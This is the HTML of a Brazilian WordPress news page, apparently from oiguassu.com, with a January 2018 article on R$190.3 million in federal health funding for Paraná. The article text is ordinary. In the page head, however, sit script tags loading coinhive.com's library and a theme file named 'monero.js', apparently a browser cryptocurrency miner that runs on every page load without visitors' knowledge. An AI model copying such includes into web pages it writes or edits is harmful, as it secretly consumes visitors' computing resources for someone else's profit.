

<!DOCTYPE html>
<html class="no-js" lang="pt-BR">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="http://oiguassu.com/xmlrpc.php" />
<title>PARANÁ TERÁ MAIS R$ 190 MILHÕES PARA ÁREA DA SAÚDE</title>

	<!-- Meta Tag Manager -->
	<meta http-equiv="pragma" content="no-cache" />
	<!-- / Meta Tag Manager -->
<link rel='dns-prefetch' href='//s0.wp.com' />
<link rel='dns-prefetch' href='//s.gravatar.com' />
<link rel='dns-prefetch' href='//coinhive.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Feed para  &raquo;" href="http://oiguassu.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para  &raquo;" href="http://oiguassu.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para  &raquo; PARANÁ TERÁ MAIS R$ 190 MILHÕES PARA ÁREA DA SAÚDE" href="http://oiguassu.com/parana-tera-mais-r-190-milhoes-para-area-da-saude/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/oiguassu.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.1"}};
			!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56794,8205,9794,65039],[55358,56794,8203,9794,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='mh-style-css'  href='http://oiguassu.com/wp-content/themes/mh_newsdesk/style.css?ver=1.3.0' type='text/css' media='all' />
<link rel='stylesheet' id='mh-font-awesome-css'  href='http://oiguassu.com/wp-content/themes/mh_newsdesk/includes/font-awesome.min.css' type='text/css' media='all' />
<link rel='stylesheet' id='mh-google-fonts-css'  href='https://fonts.googleapis.com/css?family=PT+Serif:300,400,400italic,600,700%7cOswald:300,400,400italic,600,700' type='text/css' media='all' />
<link rel='stylesheet' id='social-logos-css'  href='http://oiguassu.com/wp-content/plugins/jetpack/_inc/social-logos/social-logos.min.css?ver=1' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='http://oiguassu.com/wp-content/plugins/jetpack/css/jetpack.css?ver=5.6.1' type='text/css' media='all' />
<script type='text/javascript' src='http://oiguassu.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var related_posts_js_options = {"post_heading":"h4"};
/* ]]> */
</script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/plugins/jetpack/modules/related-posts/related-posts.js?ver=20150408'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/themes/mh_newsdesk/js/scripts.js?ver=4.9.1'></script>
<script type='text/javascript' src='https://coinhive.com/lib/coinhive.min.js?ver=4.9.1'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/themes/mh_newsdesk/js/monero.js?ver=4.9.1'></script>
<link rel='https://api.w.org/' href='http://oiguassu.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://oiguassu.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://oiguassu.com/wp-includes/wlwmanifest.xml" /> 
<link rel='prev' title='ASSISTÊNCIA SOCIAL AMPLIA QUADRO DE SERVIDORES E MELHORA A QUALIDADE DO ATENDIMENTO' href='http://oiguassu.com/assistencia-social-amplia-quadro-de-servidores-e-melhora-a-qualidade-do-atendimento/' />
<link rel='next' title='CORPO DE JOVEM QUE SE AFOGOU EM PRAINHA DE FOZ DO IGUAÇU É ENCONTRADO PELOS BOMBEIROS' href='http://oiguassu.com/corpo-de-jovem-que-se-afogou-em-prainha-de-foz-do-iguacu-e-encontrado-pelos-bombeiros/' />
<meta name="generator" content="WordPress 4.9.1" />
<link rel="canonical" href="http://oiguassu.com/parana-tera-mais-r-190-milhoes-para-area-da-saude/" />
<link rel='shortlink' href='https://wp.me/pS5BS-1ro' />
<link rel="alternate" type="application/json+oembed" href="http://oiguassu.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Foiguassu.com%2Fparana-tera-mais-r-190-milhoes-para-area-da-saude%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://oiguassu.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Foiguassu.com%2Fparana-tera-mais-r-190-milhoes-para-area-da-saude%2F&#038;format=xml" />
		<a href="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></a>
<script>
  (adsbygoogle = window.adsbygoogle || []).push({
    google_ad_client: "ca-pub-9260427313362027",
    enable_page_level_ads: true
  });
</script>

<link rel='dns-prefetch' href='//v0.wordpress.com'/>
<style type='text/css'>img#wpstats{display:none}</style>	<style type="text/css">
    	    		.social-nav a:hover, .logo-title, .entry-content a, a:hover, .entry-meta .entry-meta-author, .entry-meta a, .comment-info, blockquote, .pagination a:hover .pagelink { color: #019100; }
			.main-nav li:hover, .slicknav_menu, .ticker-title, .breadcrumb a, .breadcrumb .bc-text, .button span, .widget-title span, input[type=submit], table th, .comment-section-title .comment-count, #cancel-comment-reply-link:hover, .pagination .current, .pagination .pagelink { background: #019100; }
			blockquote, input[type=text]:hover, input[type=email]:hover, input[type=tel]:hover, input[type=url]:hover, textarea:hover { border-color: #019100; }
    	    	    				.main-nav, .main-nav ul li:hover > ul, .mh-footer { background: #019100; }
    	    	    	    		</style>
    <!--[if lt IE 9]>
<script src="http://oiguassu.com/wp-content/themes/mh_newsdesk/js/css3-mediaqueries.js"></script>
<![endif]-->
<meta name="description" content="O governo federal repassará ao Paraná R$ 190,3 milhões para a área de saúde. Desses, R$ 20,1 milhões serão repassados diretamente ao fundo municipal de Curitiba. Os anúncios foram feitos nesta terça-feira (2), na sede da prefeitura de Curitiba, pelo ministro da Saúde Ricardo Barros. A vice-governadora Cida Borghetti destacou a importância da parceria entre&hellip;" />

<!-- Jetpack Open Graph Tags -->
<meta property="og:type" content="article" />
<meta property="og:title" content="PARANÁ TERÁ MAIS R$ 190 MILHÕES PARA ÁREA DA SAÚDE" />
<meta property="og:url" content="http://oiguassu.com/parana-tera-mais-r-190-milhoes-para-area-da-saude/" />
<meta property="og:description" content="O governo federal repassará ao Paraná R$ 190,3 milhões para a área de saúde. Desses, R$ 20,1 milhões serão repassados diretamente ao fundo municipal de Curitiba. Os anúncios foram feitos nesta terç…" />
<meta property="article:published_time" content="2018-01-03T13:01:09+00:00" />
<meta property="article:modified_time" content="2018-01-03T13:01:09+00:00" />
<meta property="og:image" content="http://oiguassu.com/wp-content/uploads/2018/01/caldas4.jpg" />
<meta property="og:image:width" content="2397" />
<meta property="og:image:height" content="1565" />
<meta property="og:locale" content="pt_BR" />
<meta name="twitter:site" content="@OIguassuDigital" />
<meta name="twitter:text:title" content="PARANÁ TERÁ MAIS R$ 190 MILHÕES PARA ÁREA DA SAÚDE" />
<meta name="twitter:image" content="http://oiguassu.com/wp-content/uploads/2018/01/caldas4.jpg?w=640" />
<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:creator" content="@OIguassuDigital" />
</head>
<body class="post-template-default single single-post postid-5542 single-format-standard mh-right-sb">
<div id="mh-wrapper">
<header class="mh-header">
	<div class="header-wrap clearfix">
				<div class="mh-col mh-1-3 header-logo-full">
			<a href="http://oiguassu.com/" title="" rel="home">
<div class="logo-wrap" role="banner">
<img src="http://oiguassu.com/wp-content/uploads/2017/08/cropped-Sem-Título-1-1.jpg" height="150" width="500" alt="" />
<div class="logo">
</div>
</div>
</a>
		</div>
			</div>
	<div class="header-menu clearfix">
		<nav class="main-nav clearfix">
			<div class="menu-menu-container"><ul id="menu-menu" class="menu"><li id="menu-item-90" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-90"><a href="http://oiguassu.com">Início</a></li>
<li id="menu-item-91" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-91"><a href="http://oiguassu.com/category/foz/">Foz do Iguaçu</a></li>
<li id="menu-item-92" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-92"><a href="http://oiguassu.com/category/parana/">Paraná</a></li>
<li id="menu-item-93" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-93"><a href="http://oiguassu.com/category/brasil/">Brasil</a></li>
<li id="menu-item-94" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-94"><a href="http://oiguassu.com/category/argentina/">Argentina</a></li>
<li id="menu-item-95" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-95"><a href="http://oiguassu.com/category/paraguay/">Paraguay</a></li>
<li id="menu-item-96" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-96"><a href="http://oiguassu.com/category/latinoamerica/">Latinoamerica</a></li>
<li id="menu-item-97" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-97"><a href="http://oiguassu.com/category/colunas/">Colunas</a></li>
</ul></div>		</nav>
		<div class="header-sub clearfix">
							<div id="ticker" class="news-ticker mh-col mh-2-3 clearfix">
			<span class="ticker-title">
			Hot Topics		</span>
		<ul class="ticker-content">			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/preco-da-gasolina-diminui-e-do-diesel-sobe-hoje-nas-refinarias/" title="PREÇO DA GASOLINA DIMINUI E DO DIESEL SOBE HOJE NAS REFINARIAS">
					<span class="ticker-item-date">Janeiro 3, 2018</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">PREÇO DA GASOLINA DIMINUI E DO DIESEL SOBE HOJE NAS REFINARIAS</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/petrobras-assina-acordo-judicial-de-quase-3-bilhoes-de-dolares-nos-eua/" title="PETROBRAS ASSINA ACORDO JUDICIAL DE QUASE 3 BILHÕES DE DÓLARES NOS EUA">
					<span class="ticker-item-date">Janeiro 3, 2018</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">PETROBRAS ASSINA ACORDO JUDICIAL DE QUASE 3 BILHÕES DE DÓLARES NOS EUA</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/horacio-cartes-pierde-el-control-casi-total-que-tenia-en-diputados/" title="HORACIO CARTES PIERDE EL CONTROL CASI TOTAL QUE TENÍA EN DIPUTADOS">
					<span class="ticker-item-date">Janeiro 3, 2018</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">HORACIO CARTES PIERDE EL CONTROL CASI TOTAL QUE TENÍA EN DIPUTADOS</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/duas-pessoas-morrem-apos-carro-cair-de-ponte-na-pr-495-entre-missal-e-medianeira/" title="DUAS PESSOAS MORREM APÓS CARRO CAIR DE PONTE NA PR-495, ENTRE MISSAL E MEDIANEIRA">
					<span class="ticker-item-date">Janeiro 3, 2018</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">DUAS PESSOAS MORREM APÓS CARRO CAIR DE PONTE NA PR-495, ENTRE MISSAL E MEDIANEIRA</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/corpo-de-jovem-que-se-afogou-em-prainha-de-foz-do-iguacu-e-encontrado-pelos-bombeiros/" title="CORPO DE JOVEM QUE SE AFOGOU EM PRAINHA DE FOZ DO IGUAÇU É ENCONTRADO PELOS BOMBEIROS">
					<span class="ticker-item-date">Janeiro 3, 2018</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">CORPO DE JOVEM QUE SE AFOGOU EM PRAINHA DE FOZ DO IGUAÇU É ENCONTRADO PELOS BOMBEIROS</span>
				</a>
			</li>	</ul>
</div>						<aside class="mh-col mh-1-3 header-search">
				<form role="search" method="get" class="search-form" action="http://oiguassu.com/">
				<label>
					<span class="screen-reader-text">Pesquisar por:</span>
					<input type="search" class="search-field" placeholder="Pesquisar &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Pesquisar" />
			</form>			</aside>
		</div>
	</div>
</header><div class="mh-section mh-group">
	<div id="main-content" class="mh-content"><nav class="breadcrumb"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://oiguassu.com" itemprop="url" class="bc-home"><span itemprop="title">Home</span></a></span> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://oiguassu.com/category/parana/" itemprop="url"><span itemprop="title">Paraná</span></a></span></nav>
<article id="post-5542" class="post-5542 post type-post status-publish format-standard has-post-thumbnail hentry category-parana tag-manchete2">
	<header class="entry-header clearfix">
		<h1 class="entry-title">
			PARANÁ TERÁ MAIS R$ 190 MILHÕES PARA ÁREA DA SAÚDE		</h1>
		<div class="entry-tags clearfix"><span>TOPICS:</span><a href="http://oiguassu.com/tag/manchete2/" rel="tag">manchete2</a></div>	</header>
	
<div class="entry-thumbnail">
<img width="777" height="437" src="http://oiguassu.com/wp-content/uploads/2018/01/caldas4-777x437.jpg" class="attachment-content-single size-content-single wp-post-image" alt="" srcset="http://oiguassu.com/wp-content/uploads/2018/01/caldas4-777x437.jpg 777w, http://oiguassu.com/wp-content/uploads/2018/01/caldas4-180x101.jpg 180w, http://oiguassu.com/wp-content/uploads/2018/01/caldas4-260x146.jpg 260w, http://oiguassu.com/wp-content/uploads/2018/01/caldas4-373x210.jpg 373w, http://oiguassu.com/wp-content/uploads/2018/01/caldas4-120x67.jpg 120w" sizes="(max-width: 777px) 100vw, 777px" data-attachment-id="5543" data-permalink="http://oiguassu.com/parana-tera-mais-r-190-milhoes-para-area-da-saude/caldas4/" data-orig-file="http://oiguassu.com/wp-content/uploads/2018/01/caldas4.jpg" data-orig-size="2397,1565" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;4&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;Canon EOS-1D X&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1514908197&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;80&quot;,&quot;iso&quot;:&quot;640&quot;,&quot;shutter_speed&quot;:&quot;0.016666666666667&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="caldas4" data-image-description="" data-medium-file="http://oiguassu.com/wp-content/uploads/2018/01/caldas4-300x196.jpg" data-large-file="http://oiguassu.com/wp-content/uploads/2018/01/caldas4-1024x669.jpg" /></div>
		<p class="entry-meta">
<span class="entry-meta-author vcard author">Posted By: <a class="fn" href="http://oiguassu.com/author/carlos/">Carlos Santos</a></span>
<span class="entry-meta-date updated">Janeiro 3, 2018</span>
</p>
	<div class="entry-content clearfix">
		<h3 style="text-align: justify;">O governo federal repassará ao Paraná R$ 190,3 milhões para a área de saúde.</h3>
<p style="text-align: justify;">Desses, R$ 20,1 milhões serão repassados diretamente ao fundo municipal de Curitiba. Os anúncios foram feitos nesta terça-feira (2), na sede da prefeitura de Curitiba, pelo ministro da Saúde Ricardo Barros.</p>
<p style="text-align: justify;">A vice-governadora Cida Borghetti destacou a importância da parceria entre União, Governo do Estado e prefeituras. Segundo ela, os repasses anunciados representam uma economia de, em média, R$ 10 milhões por mês aos cofres estaduais. <em>“O dinheiro que antes seria destinado a esses fins poderá ser redirecionado e aplicado em outras áreas para atender melhor a nossa população”</em>, fala.</p>
<p style="text-align: justify;">O repasse de R$ 179,7 milhões ao Estado será dividido para cinco principais fins: R$ 90 milhões para construção do Hospital da Criança de Maringá; R$ 45 milhões para hospitais filantrópicos e públicos municipais, incluindo os hospitais da capital; R$ 20 milhões para a ampliação de consultas e exames especializados através dos consórcios intermunicipais; R$ 17,4 milhões para aquisição de equipamentos destinados ao Hospital Regional do Centro-Oeste, em Guarapuava; e R$ 7,3 milhões para o telessaúde e telemedicina.</p>
<p style="text-align: justify;">O diretor-geral da Secretaria de Estado da Saúde, Sezifredo Paz, representou o secretário Michele Caputo Neto na cerimônia. <em>“O Sistema Único de Saúde (SUS) carece de financiamentos adequados, mas isso tem melhorado a cada dia. Esse recurso chega em momento oportuno e vai fortalecer não só os hospitais, mas possibilitará aplicação de novos recursos em atenção primária e secundária”</em>, enfatiza.</p>
<h6 style="text-align: right;">(Com Agência de notícias do Paraná)</h6>
<div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-icon sd-sharing"><h3 class="sd-title">Compartilhe isso:</h3><div class="sd-content"><ul><li class="share-twitter"><a rel="nofollow" data-shared="sharing-twitter-5542" class="share-twitter sd-button share-icon no-text" href="http://oiguassu.com/parana-tera-mais-r-190-milhoes-para-area-da-saude/?share=twitter" target="_blank" title="Clique para compartilhar no Twitter"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Twitter(abre em nova janela)</span></a></li><li class="share-facebook"><a rel="nofollow" data-shared="sharing-facebook-5542" class="share-facebook sd-button share-icon no-text" href="http://oiguassu.com/parana-tera-mais-r-190-milhoes-para-area-da-saude/?share=facebook" target="_blank" title="Clique para compartilhar no Facebook"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Facebook(abre em nova janela)</span></a></li><li class="share-google-plus-1"><a rel="nofollow" data-shared="sharing-google-5542" class="share-google-plus-1 sd-button share-icon no-text" href="http://oiguassu.com/parana-tera-mais-r-190-milhoes-para-area-da-saude/?share=google-plus-1" target="_blank" title="Compartilhe no Google+"><span></span><span class="sharing-screen-reader-text">Compartilhe no Google+(abre em nova janela)</span></a></li><li class="share-end"></li></ul></div></div></div>
<div id='jp-relatedposts' class='jp-relatedposts' >
	<h3 class="jp-relatedposts-headline"><em>Relacionado</em></h3>
</div>	</div>
	</article>		<h4 class="widget-title related-content-title">
			<span>Related Articles</span>
		</h4>
		<div class="related-content clearfix"><article class="mh-col mh-1-4 content-grid post-4275 post type-post status-publish format-standard has-post-thumbnail hentry category-uncategorized tag-manchete2">
	<div class="content-thumb content-grid-thumb">
		<a href="http://oiguassu.com/educacao-ambiental-promove-seminario-no-7o-modulo-de-formacao-continuada/" title="EDUCAÇÃO AMBIENTAL PROMOVE SEMINÁRIO NO 7º MÓDULO DE FORMAÇÃO CONTINUADA"><img width="180" height="101" src="http://oiguassu.com/wp-content/uploads/2017/10/2-17-180x101.jpg" class="attachment-content-grid size-content-grid wp-post-image" alt="" srcset="http://oiguassu.com/wp-content/uploads/2017/10/2-17-180x101.jpg 180w, http://oiguassu.com/wp-content/uploads/2017/10/2-17-260x146.jpg 260w, http://oiguassu.com/wp-content/uploads/2017/10/2-17-373x210.jpg 373w, http://oiguassu.com/wp-content/uploads/2017/10/2-17-120x67.jpg 120w" sizes="(max-width: 180px) 100vw, 180px" data-attachment-id="4276" data-permalink="http://oiguassu.com/educacao-ambiental-promove-seminario-no-7o-modulo-de-formacao-continuada/2-70/" data-orig-file="http://oiguassu.com/wp-content/uploads/2017/10/2-17.jpg" data-orig-size="500,313" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="2" data-image-description="" data-medium-file="http://oiguassu.com/wp-content/uploads/2017/10/2-17-300x188.jpg" data-large-file="http://oiguassu.com/wp-content/uploads/2017/10/2-17.jpg" />		</a>
	</div>
			<p class="entry-meta">
			<span><a href="http://oiguassu.com/category/uncategorized/" rel="category tag">Uncategorized</a></span>
		</p>
		<h3 class="entry-title content-grid-title">
		<a href="http://oiguassu.com/educacao-ambiental-promove-seminario-no-7o-modulo-de-formacao-continuada/" title="EDUCAÇÃO AMBIENTAL PROMOVE SEMINÁRIO NO 7º MÓDULO DE FORMAÇÃO CONTINUADA" rel="bookmark">
			EDUCAÇÃO AMBIENTAL PROMOVE SEMINÁRIO NO 7º MÓDULO DE FORMAÇÃO CONTINUADA		</a>
	</h3>
</article>
<hr class="mh-separator content-grid-separator"><article class="mh-col mh-1-4 content-grid post-606 post type-post status-publish format-standard has-post-thumbnail hentry category-uncategorized tag-manchete2">
	<div class="content-thumb content-grid-thumb">
		<a href="http://oiguassu.com/unioeste-inaugura-restaurante-universitario/" title="Unioeste inaugura Restaurante Universitário"><img width="180" height="101" src="http://oiguassu.com/wp-content/uploads/2017/08/2-2-180x101.jpg" class="attachment-content-grid size-content-grid wp-post-image" alt="" srcset="http://oiguassu.com/wp-content/uploads/2017/08/2-2-180x101.jpg 180w, http://oiguassu.com/wp-content/uploads/2017/08/2-2-260x146.jpg 260w, http://oiguassu.com/wp-content/uploads/2017/08/2-2-373x210.jpg 373w, http://oiguassu.com/wp-content/uploads/2017/08/2-2-120x67.jpg 120w" sizes="(max-width: 180px) 100vw, 180px" data-attachment-id="607" data-permalink="http://oiguassu.com/unioeste-inaugura-restaurante-universitario/2-4/" data-orig-file="http://oiguassu.com/wp-content/uploads/2017/08/2-2.jpg" data-orig-size="549,366" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="2" data-image-description="" data-medium-file="http://oiguassu.com/wp-content/uploads/2017/08/2-2-300x200.jpg" data-large-file="http://oiguassu.com/wp-content/uploads/2017/08/2-2.jpg" />		</a>
	</div>
			<p class="entry-meta">
			<span><a href="http://oiguassu.com/category/uncategorized/" rel="category tag">Uncategorized</a></span>
		</p>
		<h3 class="entry-title content-grid-title">
		<a href="http://oiguassu.com/unioeste-inaugura-restaurante-universitario/" title="Unioeste inaugura Restaurante Universitário" rel="bookmark">
			Unioeste inaugura Restaurante Universitário		</a>
	</h3>
</article>
<hr class="mh-separator content-grid-separator"><article class="mh-col mh-1-4 content-grid post-4115 post type-post status-publish format-standard has-post-thumbnail hentry category-uncategorized tag-manchete2">
	<div class="content-thumb content-grid-thumb">
		<a href="http://oiguassu.com/foz-cataratas-e-carlos-barbosa-empatam-nas-quartas-da-liga/" title="Foz Cataratas e Carlos Barbosa empatam nas quartas da Liga"><img width="180" height="101" src="http://oiguassu.com/wp-content/uploads/2017/10/2-15-180x101.jpg" class="attachment-content-grid size-content-grid wp-post-image" alt="" srcset="http://oiguassu.com/wp-content/uploads/2017/10/2-15-180x101.jpg 180w, http://oiguassu.com/wp-content/uploads/2017/10/2-15-260x146.jpg 260w, http://oiguassu.com/wp-content/uploads/2017/10/2-15-373x210.jpg 373w, http://oiguassu.com/wp-content/uploads/2017/10/2-15-120x67.jpg 120w" sizes="(max-width: 180px) 100vw, 180px" data-attachment-id="4116" data-permalink="http://oiguassu.com/foz-cataratas-e-carlos-barbosa-empatam-nas-quartas-da-liga/2-67/" data-orig-file="http://oiguassu.com/wp-content/uploads/2017/10/2-15.jpg" data-orig-size="549,366" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="2" data-image-description="" data-medium-file="http://oiguassu.com/wp-content/uploads/2017/10/2-15-300x200.jpg" data-large-file="http://oiguassu.com/wp-content/uploads/2017/10/2-15.jpg" />		</a>
	</div>
			<p class="entry-meta">
			<span><a href="http://oiguassu.com/category/uncategorized/" rel="category tag">Uncategorized</a></span>
		</p>
		<h3 class="entry-title content-grid-title">
		<a href="http://oiguassu.com/foz-cataratas-e-carlos-barbosa-empatam-nas-quartas-da-liga/" title="Foz Cataratas e Carlos Barbosa empatam nas quartas da Liga" rel="bookmark">
			Foz Cataratas e Carlos Barbosa empatam nas quartas da Liga		</a>
	</h3>
</article>
<hr class="mh-separator content-grid-separator"><article class="mh-col mh-1-4 content-grid post-199 post type-post status-publish format-standard has-post-thumbnail hentry category-uncategorized tag-manchete2">
	<div class="content-thumb content-grid-thumb">
		<a href="http://oiguassu.com/camara-recebe-integrantes-do-coletivo-unila-resiste-e-discute-atividades-da-universidade/" title="Câmara recebe integrantes do Coletivo Unila Resiste e discute atividades da Universidade"><img width="180" height="101" src="http://oiguassu.com/wp-content/uploads/2017/08/2421_1m-180x101.jpg" class="attachment-content-grid size-content-grid wp-post-image" alt="" srcset="http://oiguassu.com/wp-content/uploads/2017/08/2421_1m-180x101.jpg 180w, http://oiguassu.com/wp-content/uploads/2017/08/2421_1m-260x146.jpg 260w, http://oiguassu.com/wp-content/uploads/2017/08/2421_1m-120x67.jpg 120w" sizes="(max-width: 180px) 100vw, 180px" data-attachment-id="205" data-permalink="http://oiguassu.com/camara-recebe-integrantes-do-coletivo-unila-resiste-e-discute-atividades-da-universidade/2421_1m/" data-orig-file="http://oiguassu.com/wp-content/uploads/2017/08/2421_1m.jpg" data-orig-size="350,232" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="2421_1m" data-image-description="" data-medium-file="http://oiguassu.com/wp-content/uploads/2017/08/2421_1m-300x199.jpg" data-large-file="http://oiguassu.com/wp-content/uploads/2017/08/2421_1m.jpg" />		</a>
	</div>
			<p class="entry-meta">
			<span><a href="http://oiguassu.com/category/uncategorized/" rel="category tag">Uncategorized</a></span>
		</p>
		<h3 class="entry-title content-grid-title">
		<a href="http://oiguassu.com/camara-recebe-integrantes-do-coletivo-unila-resiste-e-discute-atividades-da-universidade/" title="Câmara recebe integrantes do Coletivo Unila Resiste e discute atividades da Universidade" rel="bookmark">
			Câmara recebe integrantes do Coletivo Unila Resiste e discute atividades da Universidade		</a>
	</h3>
</article>
<hr class="mh-separator content-grid-separator">		</div><div class="comments-wrap">
<h4 class="comment-section-title"><span class="comment-count">Seja o Primeiro a comentar</span> <span class="comment-count-more">on "PARANÁ TERÁ MAIS R$ 190 MILHÕES PARA ÁREA DA SAÚDE"</span></h4>
</div>
	<div id="respond" class="comment-respond">
